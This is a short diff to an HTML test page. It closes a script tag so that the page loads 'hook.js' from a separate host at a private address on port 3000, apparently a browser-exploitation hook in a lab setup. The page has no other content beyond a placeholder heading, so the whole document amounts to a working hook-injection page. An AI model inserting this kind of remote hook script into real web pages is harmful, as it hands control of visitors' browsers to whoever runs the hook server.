--- a/test.html
+++ b/test.html
@@ -1,6 +1,6 @@
 <html>
 <body>
-<script src="http://192.168.1.9:3000/hook.js"> 
+<script src="http://192.168.1.9:3000/hook.js"></script>
 <h1>HHHHHHHHHHH</>
 </body>
 </html>
